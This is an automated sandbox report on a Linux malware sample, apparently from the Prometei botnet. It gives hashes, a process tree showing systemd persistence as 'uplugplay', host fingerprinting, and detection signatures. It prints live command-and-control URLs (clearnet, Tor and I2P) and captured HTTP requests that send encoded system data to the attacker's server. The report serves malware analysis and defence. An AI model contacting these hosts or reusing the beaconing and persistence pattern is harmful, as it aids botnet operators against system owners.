Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
lHxDIlc6HU

Overview

General Information

Sample Name:lHxDIlc6HU
Analysis ID:559893
MD5:06beb198dd8d97ce7673d6c99c4c9ac4
SHA1:67e54f78e02fc7feff1fda1cb489447d7990a002
SHA256:bc0ba524dde5fc3c68ccbfa3b7daa8470aced65c5d88f0829ca0e28f63154a6b
Tags:64elf
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Found Tor onion address
Drops files in suspicious directories
Sample deletes itself
Sample is packed with UPX
Sample contains only a LOAD segment without any section mappings
Writes ELF files to disk
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "uname" command used to read OS and architecture name
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Sample listens on a socket
Deletes log files
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Reads CPU information from /proc indicative of miner or evasive malware
Executes the "pgrep" command search for and/or send signals to processes

Classification

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:559893
Start date:26.01.2022
Start time:00:06:23
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 38s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:lHxDIlc6HU
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal64.evad.lin@0/58@2/0
  • VT rate limit hit for: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Command:/tmp/lHxDIlc6HU
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Starting...
System install...OK
Standard Error:Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.
  • system is lnxubuntu20
  • systemd New Fork (PID: 5201, Parent: 1)
  • logrotate (PID: 5201, Parent: 1, MD5: ff9f6831debb63e53a31ff8057143af6) Arguments: /usr/sbin/logrotate /etc/logrotate.conf
    • gzip (PID: 5265, Parent: 5201, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5266, Parent: 5201, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log "
      • sh New Fork (PID: 5267, Parent: 5266)
      • invoke-rc.d (PID: 5267, Parent: 5266, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: invoke-rc.d --quiet cups restart
        • runlevel (PID: 5268, Parent: 5267, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /sbin/runlevel
        • systemctl (PID: 5270, Parent: 5267, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-enabled cups.service
        • ls (PID: 5271, Parent: 5267, MD5: e7793f15c2ff7e747b4bc7079f5cd4f7) Arguments: ls /etc/rc[S2345].d/S[0-9][0-9]cups
        • systemctl (PID: 5272, Parent: 5267, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active cups.service
    • gzip (PID: 5273, Parent: 5201, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5274, Parent: 5201, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog
      • sh New Fork (PID: 5275, Parent: 5274)
      • rsyslog-rotate (PID: 5275, Parent: 5274, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/lib/rsyslog/rsyslog-rotate
        • systemctl (PID: 5276, Parent: 5275, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl kill -s HUP rsyslog.service
  • systemd New Fork (PID: 5202, Parent: 1)
  • install (PID: 5202, Parent: 1, MD5: 55e2520049dc6a62e8c94732e36cdd54) Arguments: /usr/bin/install -d -o man -g man -m 0755 /var/cache/man
  • systemd New Fork (PID: 5246, Parent: 1)
  • find (PID: 5246, Parent: 1, MD5: b68ef002f84cc54dd472238ba7df80ab) Arguments: /usr/bin/find /var/cache/man -type f -name *.gz -atime +6 -delete
  • systemd New Fork (PID: 5269, Parent: 1)
  • mandb (PID: 5269, Parent: 1, MD5: 1dda5ea0027ecf1c2db0f5a3de7e6941) Arguments: /usr/bin/mandb --quiet
  • lHxDIlc6HU (PID: 5284, Parent: 5119, MD5: 06beb198dd8d97ce7673d6c99c4c9ac4) Arguments: /tmp/lHxDIlc6HU
    • sh (PID: 5287, Parent: 5284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep lHxDIlc6HU"
      • sh New Fork (PID: 5288, Parent: 5287)
      • pgrep (PID: 5288, Parent: 5287, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep lHxDIlc6HU
    • sh (PID: 5291, Parent: 5284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof lHxDIlc6HU"
      • sh New Fork (PID: 5292, Parent: 5291)
      • pidof (PID: 5292, Parent: 5291, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof lHxDIlc6HU
    • sh (PID: 5295, Parent: 5284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep uplugplay"
      • sh New Fork (PID: 5296, Parent: 5295)
      • pgrep (PID: 5296, Parent: 5295, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep uplugplay
    • sh (PID: 5299, Parent: 5284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof uplugplay"
      • sh New Fork (PID: 5300, Parent: 5299)
      • pidof (PID: 5300, Parent: 5299, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof uplugplay
    • sh (PID: 5303, Parent: 5284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep upnpsetup"
      • sh New Fork (PID: 5304, Parent: 5303)
      • pgrep (PID: 5304, Parent: 5303, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep upnpsetup
    • sh (PID: 5307, Parent: 5284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
      • sh New Fork (PID: 5308, Parent: 5307)
      • systemctl (PID: 5308, Parent: 5307, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • sh (PID: 5312, Parent: 5284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable uplugplay.service"
      • sh New Fork (PID: 5324, Parent: 5312)
      • systemctl (PID: 5324, Parent: 5312, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable uplugplay.service
    • sh (PID: 5331, Parent: 5284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start uplugplay.service"
      • sh New Fork (PID: 5332, Parent: 5331)
      • systemctl (PID: 5332, Parent: 5331, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start uplugplay.service
  • systemd New Fork (PID: 5310, Parent: 5309)
  • snapd-env-generator (PID: 5310, Parent: 5309, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5329, Parent: 5328)
  • snapd-env-generator (PID: 5329, Parent: 5328, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5333, Parent: 1)
  • uplugplay (PID: 5333, Parent: 1, MD5: 06beb198dd8d97ce7673d6c99c4c9ac4) Arguments: /usr/sbin/uplugplay
    • uplugplay New Fork (PID: 5334, Parent: 5333)
      • sh (PID: 5335, Parent: 5334, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"
        • sh New Fork (PID: 5336, Parent: 5335)
        • uplugplay (PID: 5336, Parent: 5335, MD5: 06beb198dd8d97ce7673d6c99c4c9ac4) Arguments: /usr/sbin/uplugplay -Dcomsvc
          • sh (PID: 5347, Parent: 5336, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /proc/cpuinfo"
            • sh New Fork (PID: 5348, Parent: 5347)
            • cat (PID: 5348, Parent: 5347, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /proc/cpuinfo
          • sh (PID: 5351, Parent: 5336, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5352, Parent: 5351)
            • dmidecode (PID: 5352, Parent: 5351, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5355, Parent: 5336, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5356, Parent: 5355)
            • dmidecode (PID: 5356, Parent: 5355, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5359, Parent: 5336, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5360, Parent: 5359)
            • dmidecode (PID: 5360, Parent: 5359, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5363, Parent: 5336, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5364, Parent: 5363)
            • dmidecode (PID: 5364, Parent: 5363, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5367, Parent: 5336, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5368, Parent: 5367)
            • dmidecode (PID: 5368, Parent: 5367, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5371, Parent: 5336, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5372, Parent: 5371)
            • dmidecode (PID: 5372, Parent: 5371, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5375, Parent: 5336, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c dmidecode
            • sh New Fork (PID: 5376, Parent: 5375)
            • dmidecode (PID: 5376, Parent: 5375, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode
          • sh (PID: 5393, Parent: 5336, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/os-release"
            • sh New Fork (PID: 5396, Parent: 5393)
            • cat (PID: 5396, Parent: 5393, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/os-release
          • sh (PID: 5399, Parent: 5336, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 5400, Parent: 5399)
            • uptime (PID: 5400, Parent: 5399, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 5403, Parent: 5336, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 5404, Parent: 5403)
            • uname (PID: 5404, Parent: 5403, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
  • cleanup
SourceRuleDescriptionAuthorStrings
lHxDIlc6HUSUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x671d0:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x6723f:$s2: $Id: UPX
  • 0x671f0:$s3: $Info: This file is packed with the UPX executable packer
SourceRuleDescriptionAuthorStrings
/usr/sbin/uplugplaySUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x671d0:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x6723f:$s2: $Id: UPX
  • 0x671f0:$s3: $Info: This file is packed with the UPX executable packer

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: lHxDIlc6HUVirustotal: Detection: 18%Perma Link
Source: lHxDIlc6HUReversingLabs: Detection: 27%
Source: /usr/bin/pgrep (PID: 5288)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5304)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/sbin/uplugplay (PID: 5336)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/uptime (PID: 5400)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/cat (PID: 5348)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

Networking

barindex
Source: lHxDIlc6HU, 5284.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: lHxDIlc6HU, 5284.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: Mhttp://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug
Source: /usr/sbin/uplugplay (PID: 5336)Socket: 0.0.0.0::88Jump to behavior
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?r=66&i=V9PV9LOR9Q54LN8Z HTTP/1.0Host: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wM0xfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCg0KDQoNCg0KDQpVYnVudHUgJiAyMC4wNC4yIExUUyAoRm9jYWwgRm9zc2EpIA0KDQovdXNyL3NiaW4vDQogMDA6MDc6MjYgdXAgNyBtaW4sICAxIHVzZXIsICBsb2FkIGF2ZXJhZ2U6IDIuNjMsIDEuMDIsIDAuNDENCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=V9PV9LOR9Q54LN8Z&h=galassia&enckey=eEVMMJjVqQk0uXubVQrg0cpsaPCF0YTQ300u/94JUf8DWnl/2ZFYvYzBew+A8bCXbnXcjcndb3Mu4EtZmkncy6kFAvReynFFJWRp7J7ZpnHwcBIFQMPivwdwBNGaVjOp8nUBt/+kkIfC8ocfXSG0Q98NVD4a66dQGlqw4sz+8p4= HTTP/1.0Host: p3.feefreepool.net
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: lHxDIlc6HU, 5284.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
Source: lHxDIlc6HU, 5284.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
Source: lHxDIlc6HU, 5284.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://p3.feefreepool.net/cgi-bin/prometei.cgi
Source: lHxDIlc6HU, 5284.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rg
Source: lHxDIlc6HU, uplugplay.40.drString found in binary or memory: http://upx.sf.net
Source: lHxDIlc6HU, 5284.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: unknownDNS traffic detected: queries for: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?r=66&i=V9PV9LOR9Q54LN8Z HTTP/1.0Host: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wM0xfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCg0KDQoNCg0KDQpVYnVudHUgJiAyMC4wNC4yIExUUyAoRm9jYWwgRm9zc2EpIA0KDQovdXNyL3NiaW4vDQogMDA6MDc6MjYgdXAgNyBtaW4sICAxIHVzZXIsICBsb2FkIGF2ZXJhZ2U6IDIuNjMsIDEuMDIsIDAuNDENCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=V9PV9LOR9Q54LN8Z&h=galassia&enckey=eEVMMJjVqQk0uXubVQrg0cpsaPCF0YTQ300u/94JUf8DWnl/2ZFYvYzBew+A8bCXbnXcjcndb3Mu4EtZmkncy6kFAvReynFFJWRp7J7ZpnHwcBIFQMPivwdwBNGaVjOp8nUBt/+kkIfC8ocfXSG0Q98NVD4a66dQGlqw4sz+8p4= HTTP/1.0Host: p3.feefreepool.net
Source: LOAD without section mappingsProgram segment: 0x400000
Source: lHxDIlc6HU, type: SAMPLEMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: classification engineClassification label: mal64.evad.lin@0/58@2/0

Data Obfuscation

barindex
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
Source: /tmp/lHxDIlc6HU (PID: 5284)File written: /usr/sbin/uplugplayJump to dropped file
Source: /usr/sbin/uplugplay (PID: 5336)Reads from proc file: /proc/statJump to behavior
Source: /usr/bin/cat (PID: 5348)Reads from proc file: /proc/cpuinfoJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1582/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1582/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/3088/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/3088/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/230/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/230/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/110/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/110/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/231/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/231/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/111/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/111/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/232/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/232/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1579/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1579/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/112/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/112/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/233/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/233/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1699/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1699/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/113/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/113/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/234/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/234/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1335/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1335/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1698/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1698/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/114/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/114/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/235/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/235/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1334/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1334/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1576/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1576/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/2302/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/2302/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/115/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/115/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/236/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/236/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/116/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/116/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/237/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/237/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/117/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/117/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/118/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/118/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/910/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/910/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/119/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/119/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/912/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/912/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/10/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/10/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/2307/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/2307/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/11/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/11/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/918/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/918/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/12/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/12/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/13/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/13/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/14/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/14/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/15/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/15/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/16/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/16/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/17/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/17/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/18/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/18/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/5158/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/5158/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1594/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1594/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/120/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/120/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/5150/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/5150/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/121/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/121/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1349/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1349/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/1/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/122/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/122/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/243/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/243/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/123/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/123/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/2/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/2/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/124/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/124/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/3/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5296)File opened: /proc/3/cmdlineJump to behavior
Source: /usr/sbin/invoke-rc.d (PID: 5270)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-enabled cups.serviceJump to behavior
Source: /usr/sbin/invoke-rc.d (PID: 5272)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active cups.serviceJump to behavior
Source: /usr/lib/rsyslog/rsyslog-rotate (PID: 5276)Systemctl executable: /usr/bin/systemctl -> systemctl kill -s HUP rsyslog.serviceJump to behavior
